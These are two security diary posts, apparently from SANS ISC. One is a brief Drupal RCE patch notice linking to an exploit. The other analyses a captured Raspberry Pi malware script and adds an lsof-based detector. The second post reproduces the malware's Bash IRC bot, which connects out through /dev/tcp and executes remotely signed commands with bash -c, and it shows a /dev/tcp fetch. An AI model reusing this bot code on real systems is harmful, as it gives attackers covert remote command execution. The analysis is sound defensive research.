Yet Another Drupal RCE Vulnerability
Drupal today released another patch addressing a remote code execution vulnerability. According to the advisory, the vulnerability is related to the issue patched about a month ago, but this variant has not been exploited yet. Please patch ASAP!
An exploit for the vulnerability has been posted to pastebin [2]. This exploit does require authentication.
With the March update, Drupal added a global sanitization function. This approach is often difficult to implement correctly: it is very hard to sanitize and validate data before it is clear how the data will be used, in particular when this is retrofitted onto an existing and complex application like Drupal. We will see how this works out for Drupal in the long run.
[1] https://www.drupal.org/sa-core-2018-004
[2] https://pastebin.com/pRM8nmwj (leads to exploit code)
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Malicious Network Traffic From /bin/bash
One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry Pi. It's a simple UNIX Bash script that performs a bunch of malicious tasks:
- Kills existing crypto miner processes (classic action these days)
- Changes the password of the user 'pi' and adds an SSH key
- Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
- Creates an IRC bot
- Installs extra tools like zmap and sshpass
- Installs itself in /etc/rc.local for persistence
The script itself is not new: it was already spotted in July 2017, but this copy looks slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is its ability to run a simple IRC bot using only Bash commands; no high-level language is needed. For years, Bash has had an interesting feature that not many people are aware of: you can generate network flows using standard redirections. By default, a UNIX process always has the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:
$ echo "Hello world" >/dev/stderr
In the same way, Bash can use /dev/tcp or /dev/udp to generate network flows. The syntax is /dev/<proto>/<host>/<port>.
That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):
eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if [[ "$msg_in" =~ "PING" ]] ; then
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done
The magic line is the first one, which creates a new file descriptor ('3') used to read from and write to the TCP session established with the IRC server on port 6667. The attacker can submit commands to the bot via private messages once authenticated (the command's RSA signature must verify against the public key dropped in /tmp/public.pem). The result of the command is sent back to the sender.
Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile Bash with the '--enable-net-redirections' configure option. This can be helpful in many cases, for example to grab data from a remote server without any external tools:
exec 5<> /dev/tcp/blog.rootshell.be/80
# HTTP/1.0 needs CRLF line endings and a blank line to terminate the request
printf "GET / HTTP/1.0\r\nHost: blog.rootshell.be\r\n\r\n" >&5
cat <&5
exec 5>&-
A simple way to detect this behaviour is to search for network flows generated by /bin/bash processes. Example using lsof[3]:
# lsof -i | grep bash
bash 81084 xavier 5u IPv4 0x1cbc30b70d8a7879 0t0 TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
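As an added example (not part of the diary and not code from the sample), here is a small Python detector that automates this lsof check over captured output: it parses lsof -i lines, keeps only shell processes holding TCP/UDP sockets, and raises the severity when the peer port is IRC, as with the bot above. The sample output is constructed, seeded with the diary's own lsof line.

```python
import re

# Shell binaries that normally have no reason to hold their own TCP/UDP sockets.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
# Remote ports that raise severity: IRC, as used by the bot above (numeric or lsof service names).
IRC_PORTS = {"6667", "6697", "ircd", "ircs-u"}
# NAME column: local:port optionally followed by ->remote:port (bracketed IPv6 handled too).
NAME_RE = re.compile(r"^(?P<local>\S+?):(?P<lport>\w+)(?:->(?P<remote>\S+?):(?P<rport>\w+))?$")

def parse_lsof_line(line):
    """Parse one `lsof -i` data line into a dict; return None for the header or junk lines."""
    parts = line.split()
    if len(parts) < 9 or parts[0] == "COMMAND":
        return None
    cmd, pid, user, fd, _type, _dev, _off, proto, name = parts[:9]
    state = parts[9].strip("()") if len(parts) > 9 else ""
    rec = {"cmd": cmd, "pid": int(pid), "user": user, "fd": fd, "proto": proto,
           "state": state, "remote": None, "rport": None}
    m = NAME_RE.match(name)
    if m and m.group("remote"):
        rec["remote"], rec["rport"] = m.group("remote"), m.group("rport")
    return rec

def suspicious_shell_sockets(lsof_output):
    """Return shell processes holding TCP/UDP sockets, each tagged with a rough severity."""
    hits = []
    for line in lsof_output.splitlines():
        rec = parse_lsof_line(line)
        if rec is None or rec["cmd"] not in SHELLS or rec["proto"] not in ("TCP", "UDP"):
            continue
        if rec["rport"] in IRC_PORTS:
            rec["severity"] = "high"        # a shell talking IRC: bot-like behaviour
        elif rec["state"] == "ESTABLISHED":
            rec["severity"] = "medium"      # e.g. the /dev/tcp HTTP fetch shown above
        else:
            rec["severity"] = "low"         # LISTEN or no peer yet
        hits.append(rec)
    return hits

# Constructed sample output: the diary's own lsof line plus made-up neighbours.
SAMPLE = """\
COMMAND   PID   USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
bash    81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
bash     4242     pi    3u  IPv4              67890      0t0  TCP 10.0.0.5:40112->198.51.100.7:6667 (ESTABLISHED)
firefox  2301 xavier   44u  IPv4              23456      0t0  TCP 10.0.0.5:51010->93.184.216.34:443 (ESTABLISHED)
"""

if __name__ == "__main__":
    for h in suspicious_shell_sockets(SAMPLE):
        print(f"[{h['severity']}] pid={h['pid']} user={h['user']} {h['cmd']} -> {h['remote']}:{h['rport']}")
```

On a live box, feed it the real thing with lsof -nP -i piped to the script (the -nP flags keep hosts and ports numeric, which avoids the service-name lookup).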
[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant